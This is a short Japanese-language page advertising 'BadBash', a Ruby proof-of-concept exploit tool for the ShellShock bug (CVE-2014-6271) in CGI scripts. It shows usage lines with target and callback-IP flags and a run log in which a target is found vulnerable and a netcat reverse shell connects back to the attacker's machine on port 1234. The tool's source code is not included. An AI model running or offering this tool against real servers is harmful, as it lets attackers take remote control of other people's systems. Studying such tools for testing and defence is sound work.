
CVE-2014-6271 (ShellShock) RCE PoC ツール
CVE-2014-6271 (ShellShock) RCE PoC ツール
======= BadBash は CVE-2014-6271 RCE エクスプロイトツールです。基本バージョンは HTTP CGI サイトのみをチェックし、ポート 1234 での netcat リバースシェルのみを提供します。
開発者 : Andy Yang バージョン : 0.1.0 ライセンス : GPLv3
元の GitHub プロジェクト : https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - Andy Yang による CVE-2014-6271 RCE ツール 基本バージョンは HTTP サイトのみをチェックします 基本バージョンはポート 1234 での netcat リバースシェルのみを提供します
使用例:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path CGI ページの完全パス
-d, --Destination IP 受信接続を待機するあなたの IP アドレス
-h, --help ヘルプを表示
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] ターゲットが脆弱かどうかを確認中........
[Info] これには最大10秒かかるかもしれません........
[Info] ターゲットは脆弱です!!!
[Info] NCを使用してポート1234でリバースシェルを待機してください..........
[Info] netcat経由で172.16.189.1:1234に接続するリバースシェルをエクスプロイト中 ..........